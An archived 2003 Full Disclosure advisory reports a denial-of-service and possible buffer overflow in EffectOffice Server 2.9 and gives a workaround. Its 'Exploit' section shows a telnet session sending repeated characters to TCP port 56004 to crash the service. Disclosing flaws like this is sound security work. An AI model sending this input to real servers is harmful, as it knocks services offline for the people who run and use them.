Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

[securitylab.ru] EffectOffice Server 2.9 problem

From: "Alexander Antipov" <antipov () SecurityLab ru>
Date: Thu, 20 Nov 2003 16:57:02 +0300
Application: EffectOffice Server 2.9
Vendor: EffectOffice
Vendor Site: http://www.EffectOffice.com
Remote: Yes
Exploitable: Yes
Risk level: High 
Authors: D_BuG (d_bug @ bk.ru)
Authors Site: http://www.securitylab.ru 

Description: 
A vulnerability identified in EffectOffice can be exploited by a
malicious person to cause a Denial of Service and under specific
condition can lead to buffer overflow with possibility of remote code
execution.

Remote user could send a specially crafted data to 56004 TCP port on
target server to potentially cause the system to crash. 


Exploit:
 
hacker# telnet
telnet> open
(to) attackhost 56004
Trying attackhost......
Connected to attackhost.
Escape character is '^]'.
aaaaaaaaaa
aaaaaaaaaa
aaaaaaaaaa
aaaaaaaaaa
^]
telnet>close
telnet>quit
hacker#

Crash service


Workaround: Restrict access to the service allowing only connection
attempts from trusted IPs if possible.



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: